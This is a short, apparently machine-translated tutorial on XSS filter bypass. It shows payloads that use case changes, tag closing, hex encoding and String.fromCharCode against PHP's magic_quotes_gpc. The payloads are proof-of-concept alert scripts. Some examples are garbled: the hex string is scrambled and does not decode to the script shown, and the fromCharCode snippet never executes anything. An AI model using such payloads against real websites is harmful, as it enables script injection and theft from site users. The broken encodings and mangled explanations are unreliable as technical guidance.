Advanced XSS Tutorial: xSs bypass Filtering

0 × 001

The simplest thing is to change the case sensitivity.

During the test, we can change the case sensitivity of the test statement to bypass the XSS rules.

For example, <script> alert ("xss"); </script> can be converted:

<ScRipt> ALeRt ("XSS"); </sCRipT>

0 × 002

You can also disable the label.

Sometimes we need to close the tag to make our XSS take effect, such:

"> <Script> alert (" Hi "); </script>

0 × 003

Use HEX Encoding to bypass

We can encode our statements to bypass the XSS rules.

For example, <script> alert ("xss"); </script> can be converted:

% 3c % 73% 63% 72% 69% 70% 3e % 74% 6c % 61% 65% 72% 74% 28% 22% 78% 73% 73% 3b % 3c % 2f % 22% 29% 73% 63% 72% 3e

0 × 004

Bypass magic_quotes_gpc

Magic_quotes_gpc = ON is the security setting in php. After it is enabled, some special characters are rotated, for example, '(single quotation marks) is converted to \', and "(double quotation marks) is converted \", \ \\

For example, <script> alert ("xss"); </script> is converted to <script> alert (\ "xss \"); </script>, in this way, our xss will not take effect.

For websites with magic_quotes_gpc enabled, we can bypass the String. fromCharCode method in javascript. We can convert alert ("XSS")

String. fromCharCode (97,108,101,114,116, 40, 34, 88, 83, 83, 34, 41) then our XSS statement becomes

<Script> String. fromCharCode (97,108,101,114,116, 40, 34, 88, 83, 83, 34, 41, 59) </script>

String. fromCharCode () is a String method in javascript to convert ASCII to a String.

Finally, use the <script> converted file here </script> to include it.

HEX Encoding online tools:

Http://textmechanic.com/ASCII-Hex-Unicode-Base64-Converter.html

Http://www.asciitohex.com/